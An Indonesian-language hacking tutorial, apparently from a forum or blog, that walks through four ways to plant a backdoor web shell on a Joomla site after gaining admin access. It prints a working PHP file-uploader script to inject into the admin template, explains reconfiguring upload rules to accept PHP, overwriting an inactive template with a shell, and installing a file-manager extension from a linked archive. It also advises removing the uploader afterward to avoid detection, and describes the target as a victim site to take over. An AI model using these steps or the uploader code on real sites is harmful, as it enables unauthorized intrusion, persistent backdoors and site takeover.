Berbagai macam cara upload shell backdoor pada joomla

0
kali ini ane mo share sdikit bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa..
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.

CARA 1
masuk ke menu site > global configuration. trus klik bagian system
  perhatikan bagian  media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php


klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.

lalu upload deh shellnya

 udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php

CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :p
Klik menu Extension > template manager

 trus pergi di bagian administrator.

 kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.



kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa di copy script di bawah
<?php
echo '<b>www.cybersquads.com uploader</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }
else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }
}
?>
 mari kita sisipin uploadernya, taro dibawah </body> aja.


 klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.


 setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php

*kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.
:)

 CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita

 klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php


CARA 4
jika joomla compatibble dengan ninja xploler coba intall saja dengan cara masuk ke extension > instal/unintsal 


lalu browse dan pilih ninja xploler jika belum punya ninja xploler silahkan download --> https://dl.dropboxusercontent.com/s/785a2ubx17szvqw/ninja%28www.cybersquads.com.blogspot.com%29.zip?token_hash=AAF-w0uvyuORJauef38TLlOSrCP3p92ysnxgwRMb9AgdWg&dl=1

setelah selesai intall lalu pilih components > ninja xplorer


setelah itu tentukan letak upload shellnya disini saya letakkan pada folder logs lalu klik upload


setelah itu eksekusi shellnya pada http://target.com/logs/namashell.php

sekarang kalian sudah take over webnya
tinggal ubah sesuai keinginan kalian

kalau tidak bisa karna joomla telah di update dari cms yang lama ke yang baru bisa gunakan cara ini

pertama masuk content > media manager > option




setelah itu tambahkan extension php pada legal extension , legal image extension


setelah itu save and exit

lalu cobalah upload shell backdoor anda


dan berhasil kita upload shell backdoor kita pada web




hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.